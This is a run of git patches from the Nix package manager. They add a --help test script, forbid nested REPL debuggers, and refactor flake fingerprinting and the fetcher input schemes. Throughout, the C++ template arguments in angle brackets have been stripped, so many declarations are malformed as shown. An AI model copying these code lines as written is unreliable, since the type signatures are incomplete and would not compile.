     jq # Also for custom mdBook preprocessor.
   ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux
diff --git a/tests/functional/help.sh b/tests/functional/help.sh
new file mode 100644
index 000000000..74531c5d0
--- /dev/null
+++ b/tests/functional/help.sh
@@ -0,0 +1,79 @@
+source common.sh
+
+clearStore
+
+# test help output
+
+nix-build --help
+nix-shell --help
+
+nix-env --help
+nix-env --install --help
+nix-env --upgrade --help
+nix-env --uninstall --help
+nix-env --set --help
+nix-env --set-flag --help
+nix-env --query --help
+nix-env --switch-profile --help
+nix-env --list-generations --help
+nix-env --delete-generations --help
+nix-env --switch-generation --help
+nix-env --rollback --help
+
+nix-store --help
+nix-store --realise --help
+nix-store --serve --help
+nix-store --gc --help
+nix-store --delete --help
+nix-store --query --help
+nix-store --add --help
+nix-store --add-fixed --help
+nix-store --verify --help
+nix-store --verify-path --help
+nix-store --repair-path --help
+nix-store --dump --help
+nix-store --restore --help
+nix-store --export --help
+nix-store --import --help
+nix-store --optimise --help
+nix-store --read-log --help
+nix-store --dump-db --help
+nix-store --load-db --help
+nix-store --print-env --help
+nix-store --generate-binary-cache-key --help
+
+nix-channel --help
+nix-collect-garbage --help
+nix-copy-closure --help
+nix-daemon --help
+nix-hash --help
+nix-instantiate --help
+nix-prefetch-url --help
+
+function subcommands() {
+  jq -r '
+def recurse($prefix):
+  if .commands then
+    .commands | to_entries[] | .key as $k |
+    ($prefix + " " + $k) as $newPrefix |
+    if .value | has("commands") then
+      (.value | recurse($newPrefix))
+    else
+      $newPrefix
+    end
+  else
+    $prefix
+  end;
+
+.args.commands | to_entries[] | .key as $cmd |
+  if .value | has("commands") then
+    (.value | recurse($cmd))
+  else
+    $cmd
+  end
+'
+}
+
+nix __dump-cli | subcommands | while IFS= read -r cmd; do
+    nix $cmd --help
+done
diff --git a/tests/functional/local.mk b/tests/functional/local.mk
index 18eb887cd..e36323a45 100644
--- a/tests/functional/local.mk
+++ b/tests/functional/local.mk
@@ -129,7 +129,8 @@ nix_tests = \
   read-only-store.sh \
   nested-sandboxing.sh \
   impure-env.sh \
-  debugger.sh
+  debugger.sh \
+	help.sh
 
 ifeq ($(HAVE_LIBCPUID), 1)
   nix_tests += compute-levels.sh

From 4ee54339191a968991cbe89bdfb80659096421b0 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Mon, 5 Feb 2024 13:18:16 -0800
Subject: [PATCH 557/654] Add release note

---
 doc/manual/rl-next/forbid-nested-debuggers.md | 32 +++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 doc/manual/rl-next/forbid-nested-debuggers.md

diff --git a/doc/manual/rl-next/forbid-nested-debuggers.md b/doc/manual/rl-next/forbid-nested-debuggers.md
new file mode 100644
index 000000000..a5924b24f
--- /dev/null
+++ b/doc/manual/rl-next/forbid-nested-debuggers.md
@@ -0,0 +1,32 @@
+---
+synopsis: Nested debuggers are no longer supported
+prs: 9920
+---
+
+Previously, evaluating an expression that throws an error in the debugger would
+enter a second, nested debugger:
+
+```
+nix-repl> builtins.throw "what"
+error: what
+
+
+Starting REPL to allow you to inspect the current state of the evaluator.
+
+Welcome to Nix 2.18.1. Type :? for help.
+
+nix-repl>
+```
+
+Now, it just prints the error message like `nix repl`:
+
+```
+nix-repl> builtins.throw "what"
+error:
+       … while calling the 'throw' builtin
+         at «string»:1:1:
+            1| builtins.throw "what"
+             | ^
+
+       error: what
+```

From 14b0356dc5897e4acb02ff18f06c919ffcf8f146 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Fri, 2 Feb 2024 20:07:42 -0800
Subject: [PATCH 558/654] Forbid nested debuggers

---
 src/libcmd/repl.cc  |  8 +-------
 src/libexpr/eval.cc | 19 +++++++++++++++++--
 src/libexpr/eval.hh |  2 ++
 src/libutil/fmt.hh  |  2 --
 4 files changed, 20 insertions(+), 11 deletions(-)

diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 8b83608fa..75f20d635 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -336,13 +336,7 @@ ReplExitStatus NixRepl::mainLoop()
               printMsg(lvlError, e.msg());
             }
         } catch (EvalError & e) {
-            // in debugger mode, an EvalError should trigger another repl session.
-            // when that session returns the exception will land here.  No need to show it again;
-            // show the error for this repl session instead.
-            if (state->debugRepl && !state->debugTraces.empty())
-                showDebugTrace(std::cout, state->positions, state->debugTraces.front());
-            else
-                printMsg(lvlError, e.msg());
+            printMsg(lvlError, e.msg());
         } catch (Error & e) {
             printMsg(lvlError, e.msg());
         } catch (Interrupted & e) {
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index f2bbf20bb..722ff6908 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -762,10 +762,24 @@ std::unique_ptr mapStaticEnvBindings(const SymbolTable & st, const Stati
     return vm;
 }
 
+/**
+ * Sets `inDebugger` to true on construction and false on destruction.
+ */
+class DebuggerGuard {
+    bool & inDebugger;
+public:
+    DebuggerGuard(bool & inDebugger) : inDebugger(inDebugger) {
+        inDebugger = true;
+    }
+    ~DebuggerGuard() {
+        inDebugger = false;
+    }
+};
+
 void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & expr)
 {
-    // double check we've got the debugRepl function pointer.
-    if (!debugRepl)
+    // Make sure we have a debugger to run and we're not already in a debugger.
+    if (!debugRepl || inDebugger)
         return;
 
     auto dts =
@@ -792,6 +806,7 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr &
     auto se = getStaticEnv(expr);
     if (se) {
         auto vm = mapStaticEnvBindings(symbols, *se.get(), env);
+        DebuggerGuard _guard(inDebugger);
         auto exitStatus = (debugRepl)(ref(shared_from_this()), *vm);
         switch (exitStatus) {
             case ReplExitStatus::QuitAll:
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 01abd4eb1..368bb17b3 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -153,6 +153,7 @@ struct DebugTrace {
     bool isError;
 };
 
+
 class EvalState : public std::enable_shared_from_this
 {
 public:
@@ -222,6 +223,7 @@ public:
      */
     ReplExitStatus (* debugRepl)(ref es, const ValMap & extraEnv);
     bool debugStop;
+    bool inDebugger = false;
     int trylevel;
     std::list debugTraces;
     std::map> exprEnvs;
diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh
index e996f4ba2..77843f863 100644
--- a/src/libutil/fmt.hh
+++ b/src/libutil/fmt.hh
@@ -8,7 +8,6 @@
 
 namespace nix {
 
-namespace {
 /**
  * A helper for writing `boost::format` expressions.
  *
@@ -42,7 +41,6 @@ void setExceptions(boost::format & fmt)
         boost::io::too_many_args_bit ^
         boost::io::too_few_args_bit);
 }
-}
 
 /**
  * A helper for writing a `boost::format` expression to a string.

From 2e8f4faa100101e258b786494bac0996601cb4a1 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Mon, 4 Mar 2024 09:32:02 -0800
Subject: [PATCH 559/654] Fix build

Not sure why that was giving a duplicate symbol error, or why marking it
inline fixes it. Here it is!
---
 src/libutil/fmt.hh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh
index 77843f863..abbaf95b6 100644
--- a/src/libutil/fmt.hh
+++ b/src/libutil/fmt.hh
@@ -34,7 +34,7 @@ inline void formatHelper(F & f, const T & x, const Args & ... args)
 /**
  * Set the correct exceptions for `fmt`.
  */
-void setExceptions(boost::format & fmt)
+inline void setExceptions(boost::format & fmt)
 {
     fmt.exceptions(
         boost::io::all_error_bits ^

From 29049d26533fb9077b0214fad276804784e02e45 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 19:21:31 +0100
Subject: [PATCH 560/654] Implement getFingerprint() for store paths

---
 src/libfetchers/path.cc | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index 276fd1b36..8231492e8 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -147,6 +147,20 @@ struct PathInputScheme : InputScheme
         return {std::move(*storePath), input};
     }
 
+    std::optional getFingerprint(ref store, const Input & input) const override
+    {
+        /* If this path is in the Nix store, use the hash of the
+           store object and the subpath. */
+        auto path = getAbsPath(input);
+        try {
+            auto [storePath, subPath] = store->toStorePath(path.abs());
+            auto info = store->queryPathInfo(storePath);
+            return fmt("path:%s:%s", info->narHash.to_string(HashFormat::Base16, false), subPath);
+        } catch (Error &) {
+            return std::nullopt;
+        }
+    }
+
     std::optional experimentalFeature() const override
     {
         return Xp::Flakes;

From 6558da45f5497eb54cc42866f81a3660862056ff Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 19:22:23 +0100
Subject: [PATCH 561/654] LockedFlake::getFingerprint(): Use
 Input::getFingerprint()

---
 src/libcmd/installables.cc |  4 ++--
 src/libexpr/flake/flake.cc | 15 +++++++--------
 src/libexpr/flake/flake.hh |  2 +-
 3 files changed, 10 insertions(+), 11 deletions(-)

diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc
index d87d7b9b1..6db9bf9a1 100644
--- a/src/libcmd/installables.cc
+++ b/src/libcmd/installables.cc
@@ -443,10 +443,10 @@ ref openEvalCache(
     EvalState & state,
     std::shared_ptr lockedFlake)
 {
-    auto fingerprint = lockedFlake->getFingerprint();
+    auto fingerprint = lockedFlake->getFingerprint(state.store);
     return make_ref(
         evalSettings.useEvalCache && evalSettings.pureEval
-            ? std::optional { std::cref(fingerprint) }
+            ? fingerprint
             : std::nullopt,
         state,
         [&state, lockedFlake]()
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index fd9341504..4a69bb381 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -926,18 +926,17 @@ static RegisterPrimOp r4({
 
 }
 
-Fingerprint LockedFlake::getFingerprint() const
+std::optional LockedFlake::getFingerprint(ref store) const
 {
+    if (lockFile.isUnlocked()) return std::nullopt;
+
+    auto fingerprint = flake.lockedRef.input.getFingerprint(store);
+    if (!fingerprint) return std::nullopt;
+
     // FIXME: as an optimization, if the flake contains a lock file
     // and we haven't changed it, then it's sufficient to use
     // flake.sourceInfo.storePath for the fingerprint.
-    return hashString(HashAlgorithm::SHA256,
-        fmt("%s;%s;%d;%d;%s",
-            flake.path.to_string(),
-            flake.lockedRef.subdir,
-            flake.lockedRef.input.getRevCount().value_or(0),
-            flake.lockedRef.input.getLastModified().value_or(0),
-            lockFile));
+    return hashString(HashAlgorithm::SHA256, fmt("%s;%s;%s", *fingerprint, flake.lockedRef.subdir, lockFile));
 }
 
 Flake::~Flake() { }
diff --git a/src/libexpr/flake/flake.hh b/src/libexpr/flake/flake.hh
index 48907813f..1ba085f0f 100644
--- a/src/libexpr/flake/flake.hh
+++ b/src/libexpr/flake/flake.hh
@@ -119,7 +119,7 @@ struct LockedFlake
      */
     std::map, SourcePath> nodePaths;
 
-    Fingerprint getFingerprint() const;
+    std::optional getFingerprint(ref store) const;
 };
 
 struct LockFlags

From 8a6ef3bae525e04b4cf5f460edf5a8e49cf8928f Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Mon, 4 Mar 2024 19:25:28 +0100
Subject: [PATCH 562/654] less scary jq
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com>
---
 tests/functional/help.sh | 22 ++++++----------------
 1 file changed, 6 insertions(+), 16 deletions(-)

diff --git a/tests/functional/help.sh b/tests/functional/help.sh
index 74531c5d0..868f5d2e9 100644
--- a/tests/functional/help.sh
+++ b/tests/functional/help.sh
@@ -53,24 +53,14 @@ nix-prefetch-url --help
 function subcommands() {
   jq -r '
 def recurse($prefix):
-  if .commands then
-    .commands | to_entries[] | .key as $k |
-    ($prefix + " " + $k) as $newPrefix |
-    if .value | has("commands") then
-      (.value | recurse($newPrefix))
+    to_entries[] |
+    ($prefix + [.key]) as $newPrefix |
+    (if .value | has("commands") then
+      ($newPrefix, (.value.commands | recurse($newPrefix)))
     else
       $newPrefix
-    end
-  else
-    $prefix
-  end;
-
-.args.commands | to_entries[] | .key as $cmd |
-  if .value | has("commands") then
-    (.value | recurse($cmd))
-  else
-    $cmd
-  end
+    end);
+.args.commands | recurse([]) | join(" ")
 '
 }
 

From 8d23847571c2921558cbcc7593de19e7a2edd944 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Mon, 4 Mar 2024 19:25:44 +0100
Subject: [PATCH 563/654] fix indentation
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com>
---
 tests/functional/local.mk | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/tests/functional/local.mk b/tests/functional/local.mk
index e36323a45..8bb8e3600 100644
--- a/tests/functional/local.mk
+++ b/tests/functional/local.mk
@@ -130,7 +130,7 @@ nix_tests = \
   nested-sandboxing.sh \
   impure-env.sh \
   debugger.sh \
-	help.sh
+  help.sh
 
 ifeq ($(HAVE_LIBCPUID), 1)
   nix_tests += compute-levels.sh

From 2306e967674a7016c556e90e94e5f1e80171892a Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 19:30:38 +0100
Subject: [PATCH 564/654] nix profile upgrade: Always upgrade unlocked
 flakerefs

The "lockedRef" field is a misnomer, since it can be unlocked
(e.g. for a dirty Git workdir). In that case, `nix profile upgrade`
needs to assume that the package can have changed, and perform an
upgrade.
---
 src/nix/profile.cc | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index d39a24d36..60b58a78b 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -648,7 +648,9 @@ struct CmdProfileUpgrade : virtual SourceExprCommand, MixDefaultProfile, MixProf
             assert(infop);
             auto & info = *infop;
 
-            if (element.source->lockedRef == info.flake.lockedRef) continue;
+            if (info.flake.lockedRef.input.isLocked()
+                && element.source->lockedRef == info.flake.lockedRef)
+                continue;
 
             printInfo("upgrading '%s' from flake '%s' to '%s'",
                 element.source->attrPath, element.source->lockedRef, info.flake.lockedRef);

From 32bf39c73a9681317c4288aab16038dc6b401900 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 19:37:43 +0100
Subject: [PATCH 565/654] nix flake metadata: Don't show locked URL if it's not
 locked

This is the case for e.g. dirty Git workdirs, where we would get

  $ nix flake metadata
  Resolved URL:  git+file:///home/eelco/Dev/nix-master
  Locked URL:    git+file:///home/eelco/Dev/nix-master
---
 src/nix/flake.cc | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 5fc3f4166..3cd702254 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -219,6 +219,8 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
             j["resolvedUrl"] = flake.resolvedRef.to_string();
             j["resolved"] = fetchers::attrsToJSON(flake.resolvedRef.toAttrs());
             j["url"] = flake.lockedRef.to_string(); // FIXME: rename to lockedUrl
+            // "locked" is a misnomer - this is the result of the
+            // attempt to lock.
             j["locked"] = fetchers::attrsToJSON(flake.lockedRef.toAttrs());
             if (auto rev = flake.lockedRef.input.getRev())
                 j["revision"] = rev->to_string(HashFormat::Base16, false);
@@ -235,9 +237,10 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
             logger->cout(
                 ANSI_BOLD "Resolved URL:" ANSI_NORMAL "  %s",
                 flake.resolvedRef.to_string());
-            logger->cout(
-                ANSI_BOLD "Locked URL:" ANSI_NORMAL "    %s",
-                flake.lockedRef.to_string());
+            if (flake.lockedRef.input.isLocked())
+                logger->cout(
+                    ANSI_BOLD "Locked URL:" ANSI_NORMAL "    %s",
+                    flake.lockedRef.to_string());
             if (flake.description)
                 logger->cout(
                     ANSI_BOLD "Description:" ANSI_NORMAL "   %s",

From 9ee590e11301cda2b5d6341fb77f13369c3107e6 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 21:54:35 +0100
Subject: [PATCH 566/654] PosixSourceAccessor::cachedLstat(): Use absolute path

Using the relative path can cause collisions between cache entries for
PosixSourceAccessors with different roots.
---
 src/libutil/posix-source-accessor.cc | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc
index f8ec7fc6b..e91943c4c 100644
--- a/src/libutil/posix-source-accessor.cc
+++ b/src/libutil/posix-source-accessor.cc
@@ -85,16 +85,18 @@ bool PosixSourceAccessor::pathExists(const CanonPath & path)
 
 std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path)
 {
-    static Sync>> _cache;
+    static Sync>> _cache;
+
+    auto absPath = makeAbsPath(path);
 
     {
         auto cache(_cache.lock());
-        auto i = cache->find(path);
+        auto i = cache->find(absPath);
         if (i != cache->end()) return i->second;
     }
 
     std::optional st{std::in_place};
-    if (::lstat(makeAbsPath(path).c_str(), &*st)) {
+    if (::lstat(absPath.c_str(), &*st)) {
         if (errno == ENOENT || errno == ENOTDIR)
             st.reset();
         else
@@ -103,7 +105,7 @@ std::optional PosixSourceAccessor::cachedLstat(const CanonPath & pa
 
     auto cache(_cache.lock());
     if (cache->size() >= 16384) cache->clear();
-    cache->emplace(path, st);
+    cache->emplace(absPath, st);
 
     return st;
 }

From 4967c5ff6ba96b27ad1d855b3b32712c0fc3dfcf Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 22:24:12 +0100
Subject: [PATCH 567/654] Fix macOS build

---
 src/libutil/posix-source-accessor.cc | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc
index e91943c4c..41c2db59a 100644
--- a/src/libutil/posix-source-accessor.cc
+++ b/src/libutil/posix-source-accessor.cc
@@ -85,9 +85,11 @@ bool PosixSourceAccessor::pathExists(const CanonPath & path)
 
 std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path)
 {
-    static Sync>> _cache;
+    static Sync>> _cache;
 
-    auto absPath = makeAbsPath(path);
+    // Note: we convert std::filesystem::path to Path because the
+    // former is not hashable on libc++.
+    Path absPath = makeAbsPath(path);
 
     {
         auto cache(_cache.lock());

From 0e07f81d2ba532e140539e91b57d6f85c952fee2 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 4 Mar 2024 22:17:24 +0100
Subject: [PATCH 568/654] Fetcher cleanups

* Convert all InputScheme::fetch() methods to getAccessor().

* Add checkLocks() method for checking lock attributes.

* Rename fetch() to fetchToStore().
---
 src/libexpr/flake/flakeref.cc         |   2 +-
 src/libexpr/primops/fetchMercurial.cc |   3 +-
 src/libexpr/primops/fetchTree.cc      |   2 +-
 src/libfetchers/fetchers.cc           | 107 +++++++++++++++-----------
 src/libfetchers/fetchers.hh           |  25 +++++-
 src/libfetchers/git.cc                |   2 -
 src/libfetchers/github.cc             |   2 -
 src/libfetchers/indirect.cc           |   2 +-
 src/libfetchers/mercurial.cc          |  26 ++++---
 src/libfetchers/path.cc               |   6 +-
 src/nix/flake.cc                      |   2 +-
 src/nix/registry.cc                   |   4 +-
 12 files changed, 112 insertions(+), 71 deletions(-)

diff --git a/src/libexpr/flake/flakeref.cc b/src/libexpr/flake/flakeref.cc
index 86a0982f3..6fe64fd72 100644
--- a/src/libexpr/flake/flakeref.cc
+++ b/src/libexpr/flake/flakeref.cc
@@ -274,7 +274,7 @@ FlakeRef FlakeRef::fromAttrs(const fetchers::Attrs & attrs)
 
 std::pair FlakeRef::fetchTree(ref store) const
 {
-    auto [storePath, lockedInput] = input.fetch(store);
+    auto [storePath, lockedInput] = input.fetchToStore(store);
     return {std::move(storePath), FlakeRef(std::move(lockedInput), subdir)};
 }
 
diff --git a/src/libexpr/primops/fetchMercurial.cc b/src/libexpr/primops/fetchMercurial.cc
index bb029b5b3..bfc19115a 100644
--- a/src/libexpr/primops/fetchMercurial.cc
+++ b/src/libexpr/primops/fetchMercurial.cc
@@ -64,8 +64,7 @@ static void prim_fetchMercurial(EvalState & state, const PosIdx pos, Value * * a
     if (rev) attrs.insert_or_assign("rev", rev->gitRev());
     auto input = fetchers::Input::fromAttrs(std::move(attrs));
 
-    // FIXME: use name
-    auto [storePath, input2] = input.fetch(state.store);
+    auto [storePath, input2] = input.fetchToStore(state.store);
 
     auto attrs2 = state.buildBindings(8);
     state.mkStorePathString(storePath, attrs2.alloc(state.sOutPath));
diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc
index cfedfa6c4..5061e40fd 100644
--- a/src/libexpr/primops/fetchTree.cc
+++ b/src/libexpr/primops/fetchTree.cc
@@ -182,7 +182,7 @@ static void fetchTree(
 
     state.checkURI(input.toURLString());
 
-    auto [storePath, input2] = input.fetch(state.store);
+    auto [storePath, input2] = input.fetchToStore(state.store);
 
     state.allowPath(storePath);
 
diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc
index 363ad018e..483796f0b 100644
--- a/src/libfetchers/fetchers.cc
+++ b/src/libfetchers/fetchers.cc
@@ -161,7 +161,7 @@ bool Input::contains(const Input & other) const
     return false;
 }
 
-std::pair Input::fetch(ref store) const
+std::pair Input::fetchToStore(ref store) const
 {
     if (!scheme)
         throw Error("cannot fetch unsupported input '%s'", attrsToJSON(toAttrs()));
@@ -186,56 +186,85 @@ std::pair Input::fetch(ref store) const
 
     auto [storePath, input] = [&]() -> std::pair {
         try {
-            return scheme->fetch(store, *this);
+            auto [accessor, final] = getAccessorUnchecked(store);
+
+            auto storePath = nix::fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, final.getName());
+
+            auto narHash = store->queryPathInfo(storePath)->narHash;
+            final.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
+
+            scheme->checkLocks(*this, final);
+
+            return {storePath, final};
         } catch (Error & e) {
             e.addTrace({}, "while fetching the input '%s'", to_string());
             throw;
         }
     }();
 
-    auto narHash = store->queryPathInfo(storePath)->narHash;
-    input.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
-
-    if (auto prevNarHash = getNarHash()) {
-        if (narHash != *prevNarHash)
-            throw Error((unsigned int) 102, "NAR hash mismatch in input '%s' (%s), expected '%s', got '%s'",
-                to_string(),
-                store->printStorePath(storePath),
-                prevNarHash->to_string(HashFormat::SRI, true),
-                narHash.to_string(HashFormat::SRI, true));
-    }
-
-    if (auto prevLastModified = getLastModified()) {
-        if (input.getLastModified() != prevLastModified)
-            throw Error("'lastModified' attribute mismatch in input '%s', expected %d",
-                input.to_string(), *prevLastModified);
-    }
-
-    if (auto prevRev = getRev()) {
-        if (input.getRev() != prevRev)
-            throw Error("'rev' attribute mismatch in input '%s', expected %s",
-                input.to_string(), prevRev->gitRev());
-    }
-
-    if (auto prevRevCount = getRevCount()) {
-        if (input.getRevCount() != prevRevCount)
-            throw Error("'revCount' attribute mismatch in input '%s', expected %d",
-                input.to_string(), *prevRevCount);
-    }
-
     return {std::move(storePath), input};
 }
 
+void InputScheme::checkLocks(const Input & specified, const Input & final) const
+{
+    if (auto prevNarHash = specified.getNarHash()) {
+        if (final.getNarHash() != prevNarHash) {
+            if (final.getNarHash())
+                throw Error((unsigned int) 102, "NAR hash mismatch in input '%s', expected '%s' but got '%s'",
+                    specified.to_string(), prevNarHash->to_string(HashFormat::SRI, true), final.getNarHash()->to_string(HashFormat::SRI, true));
+            else
+                throw Error((unsigned int) 102, "NAR hash mismatch in input '%s', expected '%s' but got none",
+                    specified.to_string(), prevNarHash->to_string(HashFormat::SRI, true));
+        }
+    }
+
+    if (auto prevLastModified = specified.getLastModified()) {
+        if (final.getLastModified() != prevLastModified)
+            throw Error("'lastModified' attribute mismatch in input '%s', expected %d",
+                final.to_string(), *prevLastModified);
+    }
+
+    if (auto prevRev = specified.getRev()) {
+        if (final.getRev() != prevRev)
+            throw Error("'rev' attribute mismatch in input '%s', expected %s",
+                final.to_string(), prevRev->gitRev());
+    }
+
+    if (auto prevRevCount = specified.getRevCount()) {
+        if (final.getRevCount() != prevRevCount)
+            throw Error("'revCount' attribute mismatch in input '%s', expected %d",
+                final.to_string(), *prevRevCount);
+    }
+}
+
 std::pair, Input> Input::getAccessor(ref store) const
 {
     try {
-        return scheme->getAccessor(store, *this);
+        auto [accessor, final] = getAccessorUnchecked(store);
+
+        scheme->checkLocks(*this, final);
+
+        return {accessor, std::move(final)};
     } catch (Error & e) {
         e.addTrace({}, "while fetching the input '%s'", to_string());
         throw;
     }
 }
 
+std::pair, Input> Input::getAccessorUnchecked(ref store) const
+{
+    // FIXME: cache the accessor
+
+    if (!scheme)
+        throw Error("cannot fetch unsupported input '%s'", attrsToJSON(toAttrs()));
+
+    auto [accessor, final] = scheme->getAccessor(store, *this);
+
+    accessor->fingerprint = scheme->getFingerprint(store, final);
+
+    return {accessor, std::move(final)};
+}
+
 Input Input::applyOverrides(
     std::optional ref,
     std::optional rev) const
@@ -372,18 +401,6 @@ void InputScheme::clone(const Input & input, const Path & destDir) const
     throw Error("do not know how to clone input '%s'", input.to_string());
 }
 
-std::pair InputScheme::fetch(ref store, const Input & input)
-{
-    auto [accessor, input2] = getAccessor(store, input);
-    auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, input2.getName());
-    return {storePath, input2};
-}
-
-std::pair, Input> InputScheme::getAccessor(ref store, const Input & input) const
-{
-    throw UnimplementedError("InputScheme must implement fetch() or getAccessor()");
-}
-
 std::optional InputScheme::experimentalFeature() const
 {
     return {};
diff --git a/src/libfetchers/fetchers.hh b/src/libfetchers/fetchers.hh
index 472fba6f4..cd11f9eae 100644
--- a/src/libfetchers/fetchers.hh
+++ b/src/libfetchers/fetchers.hh
@@ -80,10 +80,21 @@ public:
      * Fetch the entire input into the Nix store, returning the
      * location in the Nix store and the locked input.
      */
-    std::pair fetch(ref store) const;
+    std::pair fetchToStore(ref store) const;
 
+    /**
+     * Return an InputAccessor that allows access to files in the
+     * input without copying it to the store. Also return a possibly
+     * unlocked input.
+     */
     std::pair, Input> getAccessor(ref store) const;
 
+private:
+
+    std::pair, Input> getAccessorUnchecked(ref store) const;
+
+public:
+
     Input applyOverrides(
         std::optional ref,
         std::optional rev) const;
@@ -173,9 +184,7 @@ struct InputScheme
         std::string_view contents,
         std::optional commitMsg) const;
 
-    virtual std::pair fetch(ref store, const Input & input);
-
-    virtual std::pair, Input> getAccessor(ref store, const Input & input) const;
+    virtual std::pair, Input> getAccessor(ref store, const Input & input) const = 0;
 
     /**
      * Is this `InputScheme` part of an experimental feature?
@@ -202,6 +211,14 @@ struct InputScheme
      */
     virtual bool isLocked(const Input & input) const
     { return false; }
+
+    /**
+     * Check the locking attributes in `final` against
+     * `specified`. E.g. if `specified` has a `rev` attribute, then
+     * `final` must have the same `rev` attribute. Throw an exception
+     * if there is a mismatch.
+     */
+    virtual void checkLocks(const Input & specified, const Input & final) const;
 };
 
 void registerInputScheme(std::shared_ptr && fetcher);
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index 87d114276..25eabb1dc 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -761,8 +761,6 @@ struct GitInputScheme : InputScheme
             ? getAccessorFromCommit(store, repoInfo, std::move(input))
             : getAccessorFromWorkdir(store, repoInfo, std::move(input));
 
-        accessor->fingerprint = final.getFingerprint(store);
-
         return {accessor, std::move(final)};
     }
 
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index a48c99a0b..d9d348756 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -275,8 +275,6 @@ struct GitArchiveInputScheme : InputScheme
 
         accessor->setPathDisplay("«" + input.to_string() + "»");
 
-        accessor->fingerprint = input.getFingerprint(store);
-
         return {accessor, input};
     }
 
diff --git a/src/libfetchers/indirect.cc b/src/libfetchers/indirect.cc
index 002c0c292..3f21445e1 100644
--- a/src/libfetchers/indirect.cc
+++ b/src/libfetchers/indirect.cc
@@ -97,7 +97,7 @@ struct IndirectInputScheme : InputScheme
         return input;
     }
 
-    std::pair fetch(ref store, const Input & input) override
+    std::pair, Input> getAccessor(ref store, const Input & input) const override
     {
         throw Error("indirect input '%s' cannot be fetched directly", input.to_string());
     }
diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc
index a5f55a44e..a2702338f 100644
--- a/src/libfetchers/mercurial.cc
+++ b/src/libfetchers/mercurial.cc
@@ -6,8 +6,8 @@
 #include "tarfile.hh"
 #include "store-api.hh"
 #include "url-parts.hh"
+#include "fs-input-accessor.hh"
 #include "posix-source-accessor.hh"
-
 #include "fetch-settings.hh"
 
 #include 
@@ -161,9 +161,9 @@ struct MercurialInputScheme : InputScheme
         return {isLocal, isLocal ? url.path : url.base};
     }
 
-    std::pair fetch(ref store, const Input & _input) override
+    StorePath fetchToStore(ref store, Input & input) const
     {
-        Input input(_input);
+        auto origRev = input.getRev();
 
         auto name = input.getName();
 
@@ -218,7 +218,7 @@ struct MercurialInputScheme : InputScheme
                     FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {},
                     filter);
 
-                return {std::move(storePath), input};
+                return storePath;
             }
         }
 
